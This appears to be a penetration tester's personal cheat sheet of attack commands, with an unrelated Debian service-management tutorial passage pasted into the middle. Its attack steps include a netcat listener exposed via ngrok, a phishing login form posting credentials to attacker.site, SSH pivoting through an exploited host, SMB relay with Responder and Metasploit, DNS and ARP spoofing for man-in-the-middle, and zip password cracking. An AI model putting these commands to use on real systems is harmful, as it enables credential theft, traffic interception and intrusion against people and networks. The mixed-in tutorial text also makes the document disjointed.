SSH
run
sudo dpkg –configure -a
SSH
run
sudo dpkg –configure -a
Update /etc/apt/sources.list with
deb https://http.kali.org/kali kali-rolling main contrib non-free
run below to add correct keys
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
run apt-get update & upgrade
Start nectat listener
ncat -lvp 4444
Start ngrok to make url accessible
./ngrok http 4444
Send page to users:
<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”http://attacker.site” method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>
Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host
ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117
Use Proxychain to route traffic through exploited host
ssh -D 127.0.0.1:1090 msx@192.168.68.117
Usage example nmap scan
proxychains nmap -sT -v 10.10.20.140
If you want to view the entire services running in the Debian 10, you can run the following command.
ls /etc/init.d
If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.
Systemctl list-unit-files
There are several ways to check the status of a particular service whether it is running or not. One of such methods is by using init.d. You can execute the command with root privileges having following syntax,
/etc/init.d/{servicename} status
Let’s check the status of the networking service. The complete command should look like the following,
/etc/init.d/networking status
There are two methods of stopping and starting a particular service. I will list here both of the methods.
Let me start by stopping the already running networking service to show you how to stop any service with the help of init.d. Execute the following command with root privileges,
/etc/init.d/networking stop
route -n
1. Run RunFinger.py -i<target IP> against target
2. Modify the Responder.confconfiguration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.
3.python Responder.py -I eth0 –lm
4. python MultiRelay.py -t <target IP> –u ALL
SMB Relay:
use windows/smb/smb_relay
set target SMBHOST
set SRVHOST
Configure DNS spoof record
echo “172.16.5.150 *.sportsfoo.com” > dns
Run DNS spoof
dnsspoof -i tap0 -f dns
Run Arp Mitm
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 172.16.5.30 172.16.5.1
arpspoof -i tap0 -t 172.16.5.1 172.16.5.3
fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt XXX.zip
runas /netonly /user:megabank.local\melanie cmd
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
net time -S IP -U “”
date -s time
rdate -n ip
tcpdump -i tun0 icmp (for protocol filter)